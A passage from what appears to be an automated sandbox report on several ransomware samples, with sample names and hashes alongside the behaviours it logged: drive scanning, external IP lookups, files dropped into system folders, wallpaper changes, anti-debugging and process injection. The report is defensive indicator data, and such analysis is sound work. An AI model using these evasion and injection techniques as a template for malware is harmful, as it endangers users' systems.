Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\G: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\B: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\T: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\R: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\X: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\V: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\M: taskmgr.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\F: Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe File opened (read-only) \??\T: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\L: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\Y: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\J: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\M: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\A: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\N: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\Z: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\M: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\W: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\E: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\O: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 93 api.ipify.org 139 api.ipify.org 140 ip-api.com -
Drops file in System32 directory 25 IoCs
description ioc Process File created C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.ppt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File created C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File created C:\Windows\SysWOW64\@AppHelpToast.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\@AudioToastIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\@WirelessDisplayToast.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\SecurityAndMaintenance_Error.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\WindowsCodecsRaw.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File created C:\Windows\SysWOW64\SecurityAndMaintenance_Alert.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File created C:\Windows\SysWOW64\@EnrollmentToastIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\@VpnToastIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\DefaultAccountTile.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\hra8.dll ditziw.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File opened for modification C:\Windows\SysWOW64\hra8.dll ditziw.exe File created C:\Windows\SysWOW64\SecurityAndMaintenance.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\Bthprops\@BthpropsNotificationLogo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.xls Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 8248 UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe 6232 UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe 5656 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe 5656 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe 5656 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 440 set thread context of 4972 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 122 PID 4972 set thread context of 4780 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 132 PID 4780 set thread context of 2788 4780 svchost.exe 137 PID 2432 set thread context of 3616 2432 Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe 167 PID 6044 set thread context of 5152 6044 AVShieldPro.exe 172 PID 3920 set thread context of 6376 3920 Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe 184 PID 2860 set thread context of 9180 2860 Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe 194 PID 1088 set thread context of 5732 1088 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe 227 -
resource yara_rule behavioral1/memory/1080-330-0x0000000000400000-0x000000000052E000-memory.dmp upx behavioral1/files/0x0007000000023c97-321.dat upx behavioral1/memory/1080-1237-0x0000000000400000-0x000000000052E000-memory.dmp upx behavioral1/memory/9180-2317-0x0000000000400000-0x000000000045D000-memory.dmp upx behavioral1/memory/9180-4151-0x0000000000400000-0x000000000045D000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\localhost.crt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\ThankYou\GenericEnglish-1.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover_2x.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\download-btn.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\154.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\175.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\thumb_animation.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W6.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\Assets\ValueProp_Unknown.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\logo_retina.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\MixerBranding\mixer_logo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\8041_40x40x32.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\ellipsis_16x16x32.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\6.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\skype-logo-40.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\faf_icons.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons2x.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\0.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\IncomingCallBrandingImage.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\2876_20x20x32.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\LightGray.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\video.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\LiveTiles\avatar310x310.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jmc.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W7.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_ReptileEye.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Retail\Windows_Insider_Ninjacat_Unicorn-128x128.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\music_welcome_page.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_SadMouth.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons2x.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Tented\TentMobile_24x20.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Light\Studio.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program 